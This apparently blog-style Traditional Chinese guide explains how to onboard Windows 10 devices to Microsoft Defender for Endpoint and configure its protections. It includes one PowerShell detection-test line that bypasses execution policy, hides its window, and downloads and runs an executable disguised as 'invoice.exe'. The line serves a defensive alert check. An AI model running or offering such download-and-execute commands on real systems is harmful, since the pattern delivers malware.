如何安裝並且設定 Microsoft Defender for Endpoint 的解決方案
如何安裝並且設定 Microsoft Defender for Endpoint 的解決方案0416
授權需求:
Microsoft Defender for Endpoint 的基本需求 | Microsoft Docs
Microsoft Defender for Endpoint 跨平台支援多種OS ,並且針對不同OS 提供不同的Onboard 方式
Endpoint |
Tool options |
Windows |
Local script (up to 10 devices) |
macOS |
Local scripts |
Linux Server |
|
iOS |
|
Android |
Topic |
Description |
Onboard Windows 7 and Windows 8.1 devices to Defender for Endpoint. |
|
You’ll need to onboard devices for it to report to the Defender for Endpoint service. Learn about the tools and methods you can use to configure devices in your enterprise. |
|
Onboard Windows Server 2008 R2 SP1, Windows Server 2012 R2, Windows Server 2016, Windows Server (SAC) version 1803 and later, Windows Server 2019 and later, and Windows Server 2019 core edition to Defender for Endpoint. |
|
Defender for Endpoint provides a centralized security operations experience for Windows as well as non-Windows platforms. You’ll be able to see alerts from various supported operating systems (OS) in Microsoft Defender Security Center and better protect your organization’s network. This experience leverages on a third-party security products’ sensor data. |
以通過Local Script Onboard Windows 10 為例:
參考:
使用本機指令碼上線 Windows 10 裝置 | Microsoft Docs
詳細步驟:
1. 從 Microsoft Defender Security Center [服務上架] 嚮導中,開啟已下載的 GP configuration 套件 .zip 檔案 (WindowsDefenderATPOnboardingPackage.zip) :
1. 在功能窗格中,選取 [設定] [上架]。
2. 選取 [Windows 10] 做為作業系統。
3. 在 [ 部署方法 ] 欄位中,選取 [ 本機腳本]。
4. 按一下 [ 下載套件 ] 並儲存 .zip 檔案。
5. 將設定套件的內容解壓至您要板載 (裝置上的位置(例如,桌面) )。 您應該會有一個名為 WindowsDefenderATPOnboardingScript 的檔案。
2. 在裝置上開啟已提升許可權的命令列提示字元,並執行腳本:
1. 轉至 [開始] 並鍵入 「cmd」。
2. 以滑鼠右鍵按一下 [命令提示字元],然後選取 [以系統管理員身分執行]。
3. 輸入指令檔的位置。 如果您已將檔案複製到桌面,請輸入: %userprofile%\Desktop\WindowsDefenderATPOnboardingScript.cmd
4. 按 enter 鍵或按一下 [確定]。
5. 裝置Onboard 成功後,可以通過https://securitycenter.microsoft.com/machines 看到裝置
6. 嘗試裝置上管理員角色執行以下腳本,驗證警報,將在門戶看到以下警報
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= ‘silentlycontinue’;(New-Object System.Net.WebClient).DownloadFile(‘http://127.0.0.1/1.exe’, ‘C:\\test-MDATP-test\\invoice.exe’);Start-Process ‘C:\\test-MDATP-test\\invoice.exe’
參考:
https://docs.microsoft.com/zh-tw/microsoft-365/security/defender-endpoint/run-detection-test?view=o365-worldwide
設定:
Microsoft Defender for endpoint針對各平台支援功能存在差異性。
針對IOS/Android/Mac/Linux設定請參考:
設定及驗證 Microsoft Defender ATP for Mac 的排除專案 | Microsoft Docs
在 iOS 功能上設定 Microsoft Defender for Endpoint | Microsoft Docs
為 Linux 設定及驗證 Microsoft Defender ATP 的排除專案 | Microsoft Docs
在 Android 功能上設定 Microsoft Defender for Endpoint | Microsoft Docs
l 開啟雲端保護(默認開啟):
開啟雲端保護並設定雲端保護層級以新一代保护,新一代技術提供接近即時、自動防護,以防禦新的和新興的威脅。 為了能動態地識別新的威脅,這些技術會搭配使用 Microsoft Intelligent Security Graph 中的大量互連資料,以及由進階機器學習模型驅動的強大人工智慧 (AI) 系統。
參考:
在 Microsoft Defender 防毒軟體中開啟雲端提供保護 | Microsoft Docs
指定適用于 Microsoft Defender 防病毒的雲端提供保護層級 | Microsoft Docs
l 設定攻击面缩小:
支援针对硬體,應用,漏洞防護,網絡,資料夾存取,網絡防火牆等方面设定 :
如何準備及安裝應用程式防護(包括硬體和軟體需求) |
|
控制使用者執行的應用程式,並保護核心模式進程 |
|
在兩種作業系統處理常式和個別應用程式上自動套用利用漏洞緩解技術 |
|
防止使用者使用任何應用程式來存取危險網域 |
|
保護惡意應用程式中的重要資料 |
|
受攻擊面縮小(ASR) |
防止使用漏洞搜尋惡意程式碼通常使用的動作和應用程式 |
保護網路上的裝置和資料 |
參考:
ASR Rule 參考
使用攻擊面減少規則,以防止惡意程式碼感染 | Microsoft Docs
ASR Rule 詳細操作
參考:
· Mobile Device Management (MDM)
· Microsoft Endpoint Configuration Manager
l 設定Web 內容篩選, 以根據網站的內容類別別,追蹤和控制網站的存取權
參考:
l 設定指示器,以封鎖特定URL ,IP 文件和憑證
參考:
l 啟用EDR in block mode,即使 Microsoft Defender 防病毒是以被動模式執行,也能防範惡意的資料
參考:
封鎖模式中的端點偵測和回應 | Microsoft Docs
l 設定自動調查(AIR)功能
自動調查中的技術會使用各種檢查演算法,並以安全分析員所使用的程式為基礎。 AIR 功能的設計目的是要檢查提醒並立即採取行動以解決違規行為。 AIR 功能大幅減少警示數量,讓安全性運作能夠將重點放在更複雜的威脅及其他高價值的計畫上。
參考:
l 如果裝置受Intune 管理,可以開啟Intune 和Microsoft Defender for Endpoint 集成
參考:
Use Microsoft Defender for Endpoint in Microsoft Intune – Azure | Microsoft Docs
Configure Microsoft Defender for Endpoint in Microsoft Intune – Azure | Microsoft Docs
也可以通過設定Microsoft Defender for Endpoint 基準進行快速設定,並限制針對裝置的最小保護設定。
近期留言